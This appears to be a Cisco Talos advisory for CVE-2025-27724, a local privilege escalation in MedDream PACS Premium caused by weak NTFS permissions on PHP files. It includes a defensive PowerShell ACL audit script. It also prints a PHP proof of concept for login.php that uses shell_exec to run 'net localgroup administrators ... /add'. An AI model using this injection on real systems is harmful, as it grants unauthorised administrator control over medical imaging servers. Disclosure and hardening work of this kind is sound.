CVE-2025-27724
A privilege escalation vulnerability exists in the login.php functionality of meddream MedDream PACS Premium 7.3.3.840. A specially crafted .php file can lead to elevated capabilities. An attacker can upload a malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.3.840
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-284 - Improper Access Control
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
Insufficient NTFS file permissions allow anyone with login access to alter PHP files, in particular login.php, and insert shell commands that add an account to the local Administrators group. Because the web server executes these files, an attacker with an ordinary local account can grant that account administrative rights.
Some basic instructions like the following can be added at the head of the login.php file to demonstrate adding a user account named dummyone:
// List the current members of the local Administrators group (dummyone is not yet a member)
print "\nBefore dummyone absent of administrators group user\n";
$out = shell_exec('net localgroup administrators');
echo '<pre>' . $out . '</pre>';
// Add dummyone to the group, then list the members again to confirm
print "\nNow localgroup administrators contains user dummyone \n";
$out = shell_exec('net localgroup administrators dummyone /add');
$out = shell_exec('net localgroup administrators');
echo '<pre>' . $out . '</pre>';
Once the modified login.php file is reloaded, the commands run with the privileges of the MedDream web interface, which executes as nt authority\system, so the account dummyone is automatically added to the local Administrators group.
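A defender-side check for the root cause described above, added here as an example (not Talos' or MedDream's code): a PowerShell audit of the NTFS ACLs on every PHP file under the web root that reports entries granting write-type rights to broad, low-privilege principals. The web root path is an assumption, since the advisory does not give the install location; the principal list is a reasonable default, not something the advisory specifies.

```powershell
# Added example (not Talos' or MedDream's code): audit NTFS ACLs on the PHP files
# of a MedDream web root and report entries that let low-privilege principals
# change them. $WebRoot is an assumed placeholder; point it at the real install.
param(
    [string]$WebRoot = 'C:\MedDream\Web'   # assumption: actual path differs per install
)

# Rights that allow rewriting, replacing or re-permissioning a file. Checking only
# these bits avoids false positives from the read-side bits inside Modify/FullControl.
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Principals that should never be able to change application code.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-WritablePhpFile {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -LiteralPath $Path -Filter '*.php' -Recurse -File | ForEach-Object {
        $file = $_
        $acl  = Get-Acl -LiteralPath $file.FullName
        foreach ($ace in $acl.Access) {
            # Only Allow entries matter; Deny entries restrict rather than grant.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (([int]$ace.FileSystemRights -band [int]$writeBits) -eq 0) { continue }
            if ($broadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                File      = $file.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # inherited entries come from a parent folder's ACL
            }
        }
    }
}

$findings = @(Get-WritablePhpFile -Path $WebRoot)
if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
    Write-Warning ("{0} PHP file ACE(s) grant write-type rights to broad principals." -f $findings.Count)
} else {
    Write-Output "No PHP file under $WebRoot is writable by broad principals."
}
```

Inherited findings indicate the fix belongs on the parent directory's ACL rather than on individual files; a clean result for the web root should also be re-checked after each product upgrade, since installers can reset permissions.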
2025-03-26 - Vendor Disclosure
2025-07-28 - Vendor Patch Release
2025-07-28 - Public Release
Discovered by Emmanuel Tacheau of Cisco Talos.